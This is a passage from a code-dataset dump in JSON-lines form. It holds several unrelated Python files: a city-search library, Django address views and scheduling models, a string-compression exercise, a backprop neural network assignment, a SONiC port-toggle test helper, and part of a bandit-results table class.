self.quickSortHelper(first, splitpoint - 1)\n self.quickSortHelper(splitpoint + 1, last)\n\n def partition(self, first, last):\n pivotvalue = self.cityArray[first].cname\n\n leftmark = first + 1\n rightmark = last\n\n done = False\n while not done:\n\n while leftmark <= rightmark and self.cityArray[leftmark].cname <= pivotvalue:\n leftmark = leftmark + 1\n\n while self.cityArray[rightmark].cname >= pivotvalue and rightmark >= leftmark:\n rightmark = rightmark - 1\n\n if rightmark < leftmark:\n done = True\n else:\n temp = self.cityArray[leftmark]\n self.cityArray[leftmark] = self.cityArray[rightmark]\n self.cityArray[rightmark] = temp\n\n temp = self.cityArray[first]\n self.cityArray[first] = self.cityArray[rightmark]\n self.cityArray[rightmark] = temp\n\n return rightmark\n\n def buildBST(self):\n if not self.isSorted:\n self.BST = AVLTree()\n for city in self.cityArray:\n self.BST.put(int(city.cid), city)\n self.root = self.BST.root\n\n\n\n def searchBST(self, cid):\n try:\n temp = self.BST.get(int(cid))\n if temp is not None:\n return temp\n else:\n return \"City not found\"\n except:\n return \"City not found\"\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n lib = COV19Library()\n lib.LoadData(\"cov19_city.csv\")\n lib.linearSearch(\"23700\",\"id\")\n lib.linearSearch(\"Lafayette\",\"name\")\n lib.linearSearch(\"Beebo\",\"name\")\n #lib.quickSort()\n\n'''\n #Find city with largest population\n maxPop = None\n for city in lib.cityArray:\n if maxPop is None or int(city.pop) > int(maxPop.pop):\n maxPop = city\n print(maxPop)\n\n # Test average execution of building the Binary Search Tree\n totalTime = 0\n iterations = 10\n for i in range(0, iterations):\n lib.BST = None # reset BST\n start = time_ns()\n lib.buildBST()\n end = time_ns()\n totalTime = totalTime + (end - start)\n avgTime = (totalTime / iterations) * (1e-9)\n print(\"Average time to build BST, iterations = %s: %s [Seconds]\" % (iterations, avgTime))\n\n # Generate list of randomly selected CIDs\n randCID = list()\n lib.BST = None\n lib.buildBST()\n numCity = 100\n for i in range(0,numCity):\n rand = randint(0, lib.size) # Generates random 6-Digit Number\n randCID.append(lib.cityArray[rand].cid)\n\n # Test average execution time of a linear search\n totalTime = 0\n iterations = 10\n for i in range(0, iterations):\n start = time_ns()\n for j in range(0, len(randCID) - 1):\n lib.linearSearch(randCID[j], \"id\")\n end = time_ns()\n totalTime = totalTime + (end - start)\n avgTime = (totalTime / iterations) * (1e-9)\n print(\"Average time to linearSearch through %s random CIDs, iterations = %s: %s [Seconds]\" % (numCity, iterations, avgTime))\n\n # Test average execution time of a linear search\n totalTime = 0\n iterations = 10\n for i in range(0, iterations):\n start = time_ns()\n for j in range(0, len(randCID) - 1):\n lib.searchBST(randCID[j])\n end = time_ns()\n totalTime = totalTime + (end - start)\n avgTime = (totalTime / iterations) * (1e-9)\n print(\"Average time to searchBST %s random CIDs, iterations = %s: %s [Seconds]\" % (numCity, iterations, avgTime))\n'''","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"413957969","text":"# -*- coding: utf-8 -*-\n\"\"\"地址应用模块\n\n该模块用于从数据库取出地址树并作为数据源提供给前台。\n\"\"\"\n#address.py\n#\n#Copyright (C) 2017 YINSHO(Shanghai) SoftWare Technology Co., Ltd.\n#All rights reserved\n#\n__author__ = \"lifeijie \"\n\nimport json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import ensure_csrf_cookie\n\nfrom .common import get_openid, user_register_check\nfrom ..config import APP_NAME\nfrom ..global_var import logger\nfrom ..socket_client import send2serv\n\n\ndef get_region_json(request):\n \"\"\"视图函数,返回json地址树\"\"\"\n start_node_name = request.POST.get('name')\n end_level = request.POST.get('level')\n kargs = {\n 'start_node_name': start_node_name,\n 'end_level': end_level,\n }\n context = send2serv({'path': 'address.get_region_json', 'kargs': kargs})\n return JsonResponse(context)\n\n\n@ensure_csrf_cookie\n@user_register_check\ndef modify_page(request):\n \"\"\"视图函数,返回初始化地址修改页面\"\"\"\n from_page = request.GET.get('from')\n logger.debug('FROM: %s', from_page)\n openid = request.session.get('openid')\n kargs = {\n 'from_page': from_page,\n 'openid': openid,\n 'start_node_code': '330000000000',\n 'end_level': 'county',\n }\n context = send2serv({'path': 'address.modify_page', 'kargs': kargs})\n return render(request, APP_NAME + '/address_modify.html', context)\n\n\ndef modify(request):\n \"\"\"视图函数,根据请求修改用户/商户地址\"\"\"\n logger.debug('POST: %s', request.POST)\n from_page = request.POST.get('from')\n openid = request.session.get('openid')\n id = request.POST.get('id')\n #地址解析\n address = {}\n address_pcc = request.POST.get('addressPcc')\n province = address_pcc.split(' ')[0]\n city = address_pcc.split(' ')[1]\n county = address_pcc.split(' ')[2]\n address_tv = request.POST.get('addressTv')\n town = address_tv.split(' ')[0]\n town = town if town != '不选择' else None\n village = address_tv.split(' ')[1]\n village = village if village != '不选择' else None\n address_detail = request.POST.get('addressDetail')\n kargs = {\n 'from_page': from_page,\n 'openid': openid,\n 'id': id,\n 'province': province,\n 'city': city,\n 'county': county,\n 'town': town,\n 'village': village,\n 'address_detail': address_detail,\n }\n context = send2serv({'path': 'address.modify', 'kargs': kargs})\n return JsonResponse(context)\n","sub_path":"weixin_outer/outer_app/views/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"242891375","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nimport datetime\nfrom django.utils.translation import ugettext_lazy as _\nfrom users.models import User\nfrom django.conf import settings\n\n\nclass Schedule(models.Model):\n\n YEAR_CHOICES = []\n for r in range(2016, (datetime.datetime.now().year + 1)):\n YEAR_CHOICES.append((r, r))\n\n MONTH_CHOICES = (\n (1, _('Jan')),\n (2, _('Feb')),\n (3, _('Mar')),\n (4, _('April')),\n (5, _('May')),\n (6, _('Jun')),\n (7, _('Jul')),\n (8, _('Aug')),\n (9, _('Sep')),\n (10, _('Oct')),\n (11, _('Nov')),\n (12, _('Dec')),\n )\n\n DAY_WEEK_CHOICES = (\n (0, _('monday')),\n (1, _('tuesday')),\n (2, _('wednesday')),\n (3, _('thursday')),\n (4, _('friday')),\n (5, _('saturday')),\n (6, _('sunday')),\n )\n\n user = models.ForeignKey(User, verbose_name=_('doctor'))\n year = models.IntegerField(_('year'), choices=YEAR_CHOICES, default=datetime.datetime.now().year)\n month = models.IntegerField(_('month'), choices=MONTH_CHOICES, default=datetime.datetime.now().month)\n day_week = models.IntegerField(_('day week'), choices=DAY_WEEK_CHOICES)\n start_time = models.TimeField(_('start time'), default=datetime.time(settings.WORK_TIME_START))\n end_time = models.TimeField(_('end time'), default=datetime.time(settings.WORK_TIME_END), blank=True)\n\n class Meta:\n db_table = 'schedule'\n verbose_name = _('schedule')\n verbose_name_plural = _('schedules')\n unique_together = ('user', 'year', 'month', 'day_week')\n\n def __str__(self):\n return '{day} [{year}.{month}]'.format(day=self.get_day_week_display(), year=self.year, month=self.month)\n\n\nclass Reception(models.Model):\n patient = models.CharField(_('patient'), max_length=50)\n doctor = models.ForeignKey(User, verbose_name=_('doctor'))\n date = models.DateField(_('date'))\n start_time = models.TimeField(_('start time'))\n end_time = models.TimeField(_('end time'))\n\n class Meta:\n db_table = 'reception'\n verbose_name = _('reception')\n verbose_name_plural = _('receptions')\n unique_together = ('doctor', 'date', 'start_time',)\n\n def __str__(self):\n return '{patient} {date}({start_time}-{end_time})[{doctor}]'.format(\n patient=self.patient,\n date=self.date,\n start_time=self.start_time,\n end_time=self.end_time,\n doctor=self.doctor\n )\n\n def save(self, *args, **kwargs):\n if self.start_time:\n delta = datetime.timedelta(hours=settings.RECEPTION_TIME)\n self.end_time = (datetime.datetime.combine(datetime.date(1, 1, 1), self.start_time) + delta).time()\n\n super(Reception, self).save(*args, **kwargs)\n","sub_path":"src/apps/schedules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"166376506","text":"def stringCompression(word):\n # Time: O(n)\n letterCount = 1\n output = ''\n for i in range(len(word)-1):\n if word[i]==word[i+1]:\n letterCount+=1\n else:\n output+=word[i]+ str(letterCount)\n letterCount = 1\n output+=word[-1]+str(letterCount)\n return output\n\nprint(stringCompression(\"aaaabbbbccccddddddddd\"))\n\n","sub_path":"1 - Arrays and Strings/1-6-stringComression.py","file_name":"1-6-stringComression.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"476536973","text":"#!/usr/bin/env python3\nimport numpy as np\nfrom io import StringIO\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nNUM_FEATURES = 124 #features are 1 through 123 (123 only in test set), +1 for the bias\nDATA_PATH = \"/u/cs246/data/adult/\" #TODO: if doing development somewhere other than the cycle server, change this to the directory where a7a.train, a7a.dev, and a7a.test are\n#DATA_PATH = \"/Users/Robert/Desktop/ML/adult/\"\n\n#returns the label and feature value vector for one datapoint (represented as a line (string) from the data file)\ndef parse_line(line):\n tokens = line.split()\n x = np.zeros(NUM_FEATURES)\n y = int(tokens[0])\n y = max(y,0) #treat -1 as 0 instead, because sigmoid's range is 0-1\n for t in tokens[1:]:\n parts = t.split(':')\n feature = int(parts[0])\n value = int(parts[1])\n x[feature-1] = value\n x[-1] = 1 #bias\n return y, x\n\n#return labels and feature vectors for all datapoints in the given file\ndef parse_data(filename):\n with open(filename, 'r') as f:\n vals = [parse_line(line) for line in f]\n (ys, xs) = ([v[0] for v in vals],[v[1] for v in vals])\n return np.asarray([ys],dtype=np.float32).T, np.asarray(xs,dtype=np.float32) #returns a tuple, first is an array of labels, second is an array of feature vectors\n\ndef init_model(args):\n w1 = None\n w2 = None\n\n if args.weights_files:\n with open(args.weights_files[0], 'r') as f1:\n w1 = np.loadtxt(f1)\n with open(args.weights_files[1], 'r') as f2:\n w2 = np.loadtxt(f2)\n w2 = w2.reshape(1,len(w2))\n else:\n #TODO (optional): If you want, you can experiment with a different random initialization. As-is, each weight is uniformly sampled from [-0.5,0.5).\n w1 = np.random.rand(args.hidden_dim, NUM_FEATURES) #bias included in NUM_FEATURES\n w2 = np.random.rand(1, args.hidden_dim + 1) #add bias column\n\n #At this point, w1 has shape (hidden_dim, NUM_FEATURES) and w2 has shape (1, hidden_dim + 1). In both, the last column is the bias weights.\n\n\n #TODO: Replace this with whatever you want to use to represent the network; you could use use a tuple of (w1,w2), make a class, etc.\n model = (w1, w2)\n return model\n\ndef loss_func(y, y_hat):\n return 1/2 * np.sum(np.square(y - y_hat))\n\ndef sigmoid(a):\n return 1.0/(1.0+np.exp(-a))\n\ndef dsigmoid(a):\n return sigmoid(a)*(1-sigmoid(a))\n # return z*(1-z)\n\ndef forward(model, input):\n # input-hidden\n w1, w2 = extract_weights(model)\n a1 = np.dot(w1, input)\n # print(input.shape)\n try:\n z1 = sigmoid(a1).reshape(a1.shape[0], 1)\n except:\n z1 = sigmoid(a1) \n bias = np.ones((1, z1.shape[1]))\n z1_biased = np.concatenate((z1, bias), axis = 0)\n\n # hidden-output\n a2 = np.dot(w2, z1_biased)\n z2 = sigmoid(a2)\n\n d = {\"a1\" : a1, \"z1\" : z1, \"z1_biased\" : z1_biased, \"a2\" : a2, \"z2\" : z2}\n\n return z2, d\n\n\ndef train_model(model, train_ys, train_xs, dev_ys, dev_xs, args):\n #TODO: Implement training for the given model, respecting args\n model = init_model(args)\n w1, w2 = model\n model_o = model\n acc_train, acc_dev = list(),list()\n best_iter, best_hid = 0,0\n max_acc = 0\n \n # plot and experiments\n f, axarr = plt.subplots(2, sharex=True)\n lr_arr = [0.001, 0.005, 0.01, 0.05, 0.1, 1]\n\n for l in range(len(lr_arr)):\n acc_train = list()\n acc_dev = list()\n best_iter = 0\n model_o = init_model(args)\n model = model_o\n w1, w2 = model\n for i in range(args.iterations):\n for n in range(train_ys.shape[0]): \n x_vector = train_xs[n].reshape(train_xs[n].shape[0], 1)\n\n # forward\n y_hat, dic = forward(model, x_vector)\n loss = loss_func(x_vector, y_hat)\n\n # backward\n delta2 = (y_hat-train_ys[n]) * dsigmoid(dic[\"a2\"])\n #print(delta2.shape)\n dweight2 = np.dot(delta2, dic[\"z1_biased\"].T)\n w2_reduced = w2[:, 0:w2.shape[1]-1]\n delta1 = delta2 * (w2_reduced.T * dsigmoid(dic[\"a1\"]))\n\n dweight1 = np.dot(delta1, x_vector.T)\n \n w2 = w2 - lr_arr[l] * dweight2\n w1 = w1 - lr_arr[l] * dweight1\n model = (w1, w2)\n\n if not args.nodev:\n acc_train.append(test_accuracy(model, train_ys, train_xs))\n acc_dev.append(test_accuracy(model, dev_ys, dev_xs))\n if i == 0:\n max_acc = test_accuracy(model, dev_ys, dev_xs)\n best_iter = 0\n model_o = w1, w2\n elif (i > 0) and (acc_dev[i] > max_acc):\n best_iter = i\n model_o = w1, w2\n max_acc = acc_dev[i]\n\n if not args.nodev:\n x = range(1, args.iterations+1)\n sns.set()\n pal = sns.color_palette(\"Set2\", 6)\n axarr[0].plot(x, acc_train, c=pal[l], label='lr={}'.format(lr_arr[l]), linewidth=1)\n axarr[0].legend(loc='lower right')\n axarr[0].set_ylim(0.2,1)\n axarr[0].set_title('Training')\n\n axarr[1].plot(x, acc_dev, c=pal[l], label='lr={}'.format(lr_arr[l]), linewidth=1)\n axarr[1].legend(loc='lower right')\n axarr[1].set_ylim(0.2,1)\n axarr[1].set_title('Dev')\n print('Best number of iterations at learning rate = %s, hidden layer dimension = %s is %s' % (lr_arr[l], args.hidden_dim, best_iter+1))\n print('Accuracy: {}'.format(acc_dev[best_iter]))\n\n plt.show()\n\n if not args.nodev:\n return model_o\n\n return model\n\ndef test_accuracy(model, test_ys, test_xs):\n y_hat = forward(model, test_xs.T)[0]\n return np.sum((test_ys.T >= 0.5) == (y_hat >= 0.5)) / test_xs.shape[0]\n\n\ndef extract_weights(model):\n w1 = model[0]\n w2 = model[1]\n #TODO: Extract the two weight matrices from the model and return them (they should be the same type and shape as they were in init_model, but now they have been updated during training)\n return w1, w2\n\ndef main():\n import argparse\n import os\n\n parser = argparse.ArgumentParser(description='Neural network with one hidden layer, trainable with backpropagation.')\n parser.add_argument('--nodev', action='store_true', default=False, help='If provided, no dev data will be used.')\n parser.add_argument('--iterations', type=int, default=5, help='Number of iterations through the full training data to perform.')\n parser.add_argument('--lr', type=float, default=0.1, help='Learning rate to use for update in training loop.')\n\n weights_group = parser.add_mutually_exclusive_group()\n weights_group.add_argument('--weights_files', nargs=2, metavar=('W1','W2'), type=str, help='Files to read weights from (in format produced by numpy.savetxt). First is weights from input to hidden layer, second is from hidden to output.')\n weights_group.add_argument('--hidden_dim', type=int, default=5, help='Dimension of hidden layer.')\n\n parser.add_argument('--print_weights', action='store_true', default=False, help='If provided, print final learned weights to stdout (used in autograding)')\n\n parser.add_argument('--train_file', type=str, default=os.path.join(DATA_PATH,'a7a.train'), help='Training data file.')\n parser.add_argument('--dev_file', type=str, default=os.path.join(DATA_PATH,'a7a.dev'), help='Dev data file.')\n parser.add_argument('--test_file', type=str, default=os.path.join(DATA_PATH,'a7a.test'), help='Test data file.')\n\n\n args = parser.parse_args()\n\n \"\"\"\n At this point, args has the following fields:\n\n args.nodev: boolean; if True, you should not use dev data; if False, you can (and should) use dev data.\n args.iterations: int; number of iterations through the training data.\n args.lr: float; learning rate to use for training update.\n args.weights_files: iterable of str; if present, contains two fields, the first is the file to read the first layer's weights from, second is for the second weight matrix.\n args.hidden_dim: int; number of hidden layer units. If weights_files is provided, this argument should be ignored.\n args.train_file: str; file to load training data from.\n args.dev_file: str; file to load dev data from.\n args.test_file: str; file to load test data from.\n \"\"\"\n train_ys, train_xs = parse_data(args.train_file)\n dev_ys = None\n dev_xs = None\n if not args.nodev:\n dev_ys, dev_xs= parse_data(args.dev_file)\n test_ys, test_xs = parse_data(args.test_file)\n\n model = init_model(args)\n model = train_model(model, train_ys, train_xs, dev_ys, dev_xs, args)\n accuracy = test_accuracy(model, test_ys, test_xs)\n print('Test accuracy: {}'.format(accuracy))\n if args.print_weights:\n w1, w2 = extract_weights(model)\n with StringIO() as weights_string_1:\n np.savetxt(weights_string_1,w1)\n print('Hidden layer weights: {}'.format(weights_string_1.getvalue()))\n with StringIO() as weights_string_2:\n np.savetxt(weights_string_2,w2)\n print('Output layer weights: {}'.format(weights_string_2.getvalue()))\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"HW3/backprop_files/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"120520332","text":"\"\"\"\nTool used for shutdown/startup port on the DUT.\n\"\"\"\n\nimport datetime\nimport time\nimport logging\nimport pprint\n\nfrom tests.common.helpers.assertions import pytest_assert\n\nlogger = logging.getLogger(__name__)\n\n\ndef port_toggle(duthost, tbinfo, ports=None, wait=60, wait_after_ports_up=60, watch=False):\n \"\"\"\n Toggle ports on DUT.\n\n Args:\n duthost: DUT host object\n ports: Specify list of ports, None if toggle all ports\n wait: Time to wait for interface to become up\n wait_after_ports_up: Time to wait after interfaces become up\n watch: Logging system state\n \"\"\"\n\n def __get_down_ports():\n \"\"\"Check interface status and return the down ports in a set\n \"\"\"\n total_down_ports = set()\n ports_down = duthost.interface_facts(up_ports=ports)['ansible_facts']['ansible_interface_link_down_ports']\n db_ports_down = duthost.show_interface(command='status', up_ports=ports)['ansible_facts']\\\n ['ansible_interface_link_down_ports']\n total_down_ports.update(ports_down)\n total_down_ports.update(db_ports_down)\n return total_down_ports\n\n if ports is None:\n logger.debug('ports is None, toggling all minigraph ports')\n mg_facts = duthost.get_extended_minigraph_facts(tbinfo)\n ports = mg_facts['minigraph_ports'].keys()\n\n logger.info('toggling ports:\\n%s', pprint.pformat(ports))\n\n cmds_down = []\n cmds_up = []\n for port in ports:\n cmds_down.append('config interface shutdown {}'.format(port))\n cmds_up.append('config interface startup {}'.format(port))\n\n shutdown_ok = False\n shutdown_err_msg = ''\n try:\n duthost.shell_cmds(cmds=cmds_down)\n if watch:\n time.sleep(1)\n\n # Watch memory status\n memory_output = duthost.shell(\"show system-memory\")[\"stdout\"]\n logger.info(\"Memory Status: %s\", memory_output)\n\n # Watch orchagent CPU utilization\n orch_cpu = duthost.shell(\"show processes cpu | grep orchagent | awk '{print $9}'\")[\"stdout\"]\n logger.info(\"Orchagent CPU Util: %s\", orch_cpu)\n\n # Watch Redis Memory\n redis_memory = duthost.shell(\"redis-cli info memory | grep used_memory_human\")[\"stdout\"]\n logger.info(\"Redis Memory: %s\", redis_memory)\n\n logger.info('Wait for ports to become down.')\n start_time = datetime.datetime.now()\n while True:\n down_ports = __get_down_ports()\n if len(down_ports) == len(ports):\n shutdown_ok = True\n break\n time.sleep(5)\n if (datetime.datetime.now() - start_time).seconds > 20:\n break\n\n if not shutdown_ok:\n shutdown_err_msg = 'Some ports did not go down as expected: {}'.format(str(set(ports) - set(down_ports)))\n except Exception as e:\n shutdown_err_msg = 'Shutdown ports failed with exception: {}'.format(repr(e))\n\n startup_ok = False\n startup_err_msg = ''\n try:\n duthost.shell_cmds(cmds=cmds_up)\n\n logger.info('Wait for ports to become up.')\n start_time = datetime.datetime.now()\n while True:\n down_ports = __get_down_ports()\n if len(down_ports) == 0:\n startup_ok = True\n break\n time.sleep(5)\n if (datetime.datetime.now() - start_time).seconds > wait:\n break\n\n if not startup_ok:\n startup_err_msg = 'Some ports did not go up as expected: {}'.format(str(down_ports))\n\n except Exception as e:\n startup_err_msg = 'Startup interfaces failed with exception: {}'.format(repr(e))\n\n pytest_assert(shutdown_ok, shutdown_err_msg)\n pytest_assert(startup_ok, startup_err_msg)\n\n logger.info('wait %d seconds for system to startup', wait_after_ports_up)\n time.sleep(wait_after_ports_up)\n","sub_path":"tests/common/port_toggle.py","file_name":"port_toggle.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"587238346","text":"import re\nimport collections\n\nfrom copy import copy\nfrom numbers import Number\nfrom operator import truediv\nfrom itertools import chain, repeat, accumulate\nfrom collections.abc import Container\nfrom typing import Any, Iterable, Dict, List, Tuple, Optional, Sequence, Hashable, Iterator, Union, Type, Callable\n\nfrom coba.config import CobaConfig\nfrom coba.utilities import PackageChecker\nfrom coba.pipes import Filter, Cartesian, JsonEncode, JsonDecode, StopPipe, Pipe, DiskSink, DiskSource\n\nclass Table:\n \"\"\"A container class for storing tabular data.\"\"\"\n\n def __init__(self, name:str, primary_cols: Sequence[str], rows: Sequence[Dict[str,Any]] = []):\n \"\"\"Instantiate a Table.\n \n Args:\n name: The name of the table.\n default: The default values to fill in missing values with\n \"\"\"\n self._name = name\n self._primary = primary_cols\n\n def index_cols():\n for row in rows:\n if '_packed' in row: \n return ['index']\n return []\n \n def data_cols():\n return ( sorted(row.keys() - ['_packed'] | row.get('_packed',{}).keys()) for row in rows)\n\n for row in rows:\n assert len(row.keys() & primary_cols) == len(primary_cols), 'A Table row was provided without a primary key.'\n\n all_columns = list(chain(primary_cols, index_cols(), *data_cols()))\n self._columns = sorted(set(all_columns), key=lambda col: all_columns.index(col))\n\n self._rows_keys: List[Hashable ] = [] \n self._rows_flat: Dict[Hashable, Dict[str,Any]] = {}\n self._rows_pack: Dict[Hashable, Dict[str,Any]] = {}\n\n for row in rows:\n row_key = row[primary_cols[0]] if len(primary_cols) == 1 else tuple(row[col] for col in primary_cols)\n row_pack = row.pop('_packed',{})\n row_flat = row\n\n if row_pack:\n row_pack['index'] = list(range(1,len(list(row_pack.values())[0])+1))\n\n self._rows_keys.append(row_key)\n self._rows_pack[row_key] = row_pack\n self._rows_flat[row_key] = row_flat\n\n self._rows_keys = sorted(self._rows_keys)\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def keys(self) -> Sequence[Hashable]:\n return self._rows_keys\n\n @property\n def columns(self) -> Sequence[str]:\n return self._columns\n\n @property\n def dtypes(self) -> Sequence[Type[Union[int,float,bool,object]]]:\n\n flats = self._rows_flat\n packs = self._rows_pack\n\n columns_packed = [ any([ col in packs[key] for key in self.keys]) for col in self.columns ]\n columns_values = [ [flats[key].get(col, packs[key].get(col, self._default(col))) for key in self.keys] for col in self.columns ]\n\n return [ self._infer_type(column_packed, column_values) for column_packed, column_values in zip(columns_packed,columns_values)]\n\n def window(self, partition_by:Sequence[str], order_by:Sequence[str], window_lim:Tuple[float,float], functions: Dict[str,Callable]):\n partitions = collections.defaultdict(list)\n\n for key in self.keys:\n flat = self._rows_flat[key]\n part_key = tuple([flat[part_by] for part_by in partition_by])\n partitions[part_key].append(flat)\n\n def aggregate(self, group_by:Sequence[str], functions:Dict[str,Callable]):\n pass\n\n def filter(self, pred:Callable[[Dict[str,Any]],bool] = None, **kwargs) -> 'Table':\n\n def satisfies_all_filters(key):\n row = self[key]\n\n if pred is not None and not pred(row):\n return False\n\n for col,value in kwargs.items():\n if isinstance(value,Container) and not isinstance(value,str) and row[col] not in value:\n return False\n if isinstance(value,Number) and not re.search(f'(\\D|^){value}(\\D|$)', str(row[col])):\n return False \n if isinstance(value,str) and not re.search(value, row[col]):\n return False\n if callable(value) and not value(row[col]):\n return False\n\n return True\n\n new_result = copy(self)\n new_result._rows_keys = list(filter(satisfies_all_filters,self.keys))\n\n return new_result\n\n def to_pandas(self) -> Any:\n PackageChecker.pandas(\"Table.to_pandas\")\n import pandas as pd #type: ignore\n import numpy as np #type: ignore #pandas installs numpy so if we have pandas we have numpy\n\n col_numpy = { col: np.empty(len(self), dtype=dtype) for col,dtype in zip(self.columns,self.dtypes)}\n\n row_index = 0\n\n for key in self.keys:\n\n flat = self._rows_flat[key]\n pack = self._rows_pack[key]\n\n pack_size = 1 if not pack else len(pack['index'])\n\n for col in self.columns:\n if col in pack:\n val = pack[col]\n\n elif col in flat:\n if isinstance(flat[col], (tuple,list)):\n val = [flat[col]]\n else:\n val = flat[col]\n\n else:\n val = self._default(col)\n \n col_numpy[col][row_index:(row_index+pack_size)] = val\n\n row_index += pack_size\n\n return pd.DataFrame(col_numpy, columns=self.columns)\n\n def to_tuples(self) -> Sequence[Tuple[Any,...]]:\n\n tooples = []\n\n for key in self.keys:\n \n flat = self._rows_flat[key]\n pack = self._rows_pack[key]\n\n if not pack:\n tooples.append(tuple(flat.get(col,self._default(col)) for col in self.columns))\n else:\n tooples.extend(zip(*[pack.get(col,repeat(flat.get(col,self._default(col)))) for col in self.columns]))\n\n return tooples\n\n def _default(self, column:str) -> Any:\n return [1] if column == \"index\" else float('nan')\n\n def _infer_type(self, is_packed: bool, values: Sequence[Any]) -> Type[Union[int,float,bool,object]]:\n\n types: List[Optional[Type[Any]]] = []\n\n to_type = lambda value: None if value is None else type(value)\n\n for value in values:\n if is_packed and isinstance(value, (list,tuple)):\n types.extend([to_type(v) for v in value])\n else:\n types.append(to_type(value))\n \n return self._resolve_types(types)\n\n def _resolve_types(self, types: Sequence[Optional[Type[Any]]]) -> Type[Union[int,float,bool,object]]:\n types = list(set(types))\n\n if len(types) == 1 and types[0] in [dict,str]:\n return object\n \n if len(types) == 1 and types[0] in [int,float,bool]:\n return types[0]\n\n if all(t in [None,int,float] for t in types):\n return float\n\n return object\n\n def __iter__(self) -> Iterator[Dict[str,Any]]:\n for key in self.keys:\n yield self[key]\n\n def __contains__(self, key: Union[Hashable, Sequence[Hashable]]) -> bool:\n return key in self.keys\n\n def __str__(self) -> str:\n return str({\"Table\": self.name, \"Columns\": self.columns, \"Rows\": len(self)})\n\n def __len__(self) -> int:\n return sum([ len(self._rows_pack[key].get('index',[None])) for key in self.keys ])\n\n def __getitem__(self, key: Union[Hashable, Sequence[Hashable]]) -> Dict[str,Any]:\n if key not in self.keys: raise KeyError(key)\n return dict(**self._rows_flat[key], **self._rows_pack[key])\n\nclass InteractionsTable(Table):\n\n def to_progressive_list(self, span: int = None, each:bool=False):\n #Learner, Simulation, Index\n #Learner, Index\n\n lrn_sim_rows = []\n\n for interactions in self:\n \n rewards = interactions[\"reward\"]\n\n if span is None or span >= len(rewards):\n cumwindow = list(accumulate(rewards))\n cumdivisor = list(range(1,len(cumwindow)+1))\n \n elif span == 1:\n cumwindow = list(rewards)\n cumdivisor = [1]*len(cumwindow)\n\n else:\n alpha = 2/(1+span)\n cumwindow = list(accumulate(rewards , lambda a,c: c + (1-alpha)*a))\n cumdivisor = list(accumulate([1.]*len(rewards), lambda a,c: c + (1-alpha)*a)) #type: ignore\n\n lrn_sim_rows.append([interactions[\"learner_id\"], interactions[\"simulation_id\"], *list(map(truediv, cumwindow, cumdivisor))])\n\n if each:\n return lrn_sim_rows\n \n else:\n grouped_lrn_sim_rows = collections.defaultdict(list)\n \n for row in lrn_sim_rows:\n grouped_lrn_sim_rows[row[0]].append(row[2:])\n\n lrn_rows = []\n\n for learner_id in grouped_lrn_sim_rows.keys():\n\n Z = list(zip(*grouped_lrn_sim_rows[learner_id]))\n \n if not Z: continue\n\n Y = [ sum(z)/len(z) for z in Z ]\n\n lrn_rows.append([learner_id, *Y])\n\n return lrn_rows\n\n def to_progressive_pandas(self, span: int = None, each:bool=False):\n PackageChecker.pandas(\"Result.to_pandas\")\n\n import pandas as pd\n\n data = self.to_lists(span, each)\n \n if each:\n n_index = len(data[0][2:])\n return pd.DataFrame(data, columns=[\"learner_id\", \"simulation_id\", *range(1,n_index+1)])\n \n else:\n n_index = len(data[0][1:])\n return pd.DataFrame(data, columns=[\"learner_id\", *range(1,n_index+1)])\n\nclass Result:\n \"\"\"A class representing the result of a Benchmark evaluation on a given collection of Simulations and Learners.\"\"\"\n\n @staticmethod\n def from_file(filename: str) -> 'Result':\n \"\"\"Create a Result from a transaction file.\"\"\"\n \n #Why is this here??? This is really confusing in practice\n #if filename is None or not Path(filename).exists(): return Result()\n\n json_encode = Cartesian(JsonEncode())\n json_decode = Cartesian(JsonDecode())\n\n Pipe.join(DiskSource(filename), [json_decode, ResultPromote(), json_encode], DiskSink(filename, 'w')).run()\n \n return Result.from_transactions(Pipe.join(DiskSource(filename), [json_decode]).read())\n\n @staticmethod\n def from_transactions(transactions: Iterable[Any]) -> 'Result':\n\n version = None\n benchmark = {}\n lrn_rows = []\n sim_rows = []\n int_rows = []\n\n for trx in transactions:\n if trx[0] == \"version\" : version = trx[1]\n if trx[0] == \"benchmark\": benchmark = trx[1]\n if trx[0] == \"S\" : sim_rows.append({**trx[2], \"simulation_id\": trx[1]})\n if trx[0] == \"L\" : lrn_rows.append({**trx[2], \"learner_id\" : trx[1]})\n if trx[0] == \"I\" : int_rows.append({**trx[2], \"simulation_id\": trx[1][0], \"learner_id\": trx[1][1]})\n\n return Result(version, benchmark, sim_rows, lrn_rows, int_rows)\n\n def __init__(self,\n version : Optional[int] = None,\n benchmark: Dict[str,Any] = {},\n sim_rows : Sequence[Dict[str,Any]] = [],\n lrn_rows : Sequence[Dict[str,Any]] = [],\n int_rows : Sequence[Dict[str,Any]] = []) -> None:\n \"\"\"Instantiate a Result class.\"\"\"\n\n self.version = version\n self.benchmark = benchmark\n\n self._simulations = Table (\"Simulations\" , ['simulation_id' ], sim_rows)\n self._learners = Table (\"Learners\" , ['learner_id' ], lrn_rows)\n self._interactions = InteractionsTable(\"Interactions\", ['simulation_id', 'learner_id'], int_rows)\n\n @property\n def learners(self) -> Table:\n \"\"\"The collection of learners evaluated by Benchmark. The easiest way to work with the \n learners is to convert them to a pandas data frame via Result.learners.to_pandas()\n \"\"\"\n return self._learners\n\n @property\n def simulations(self) -> 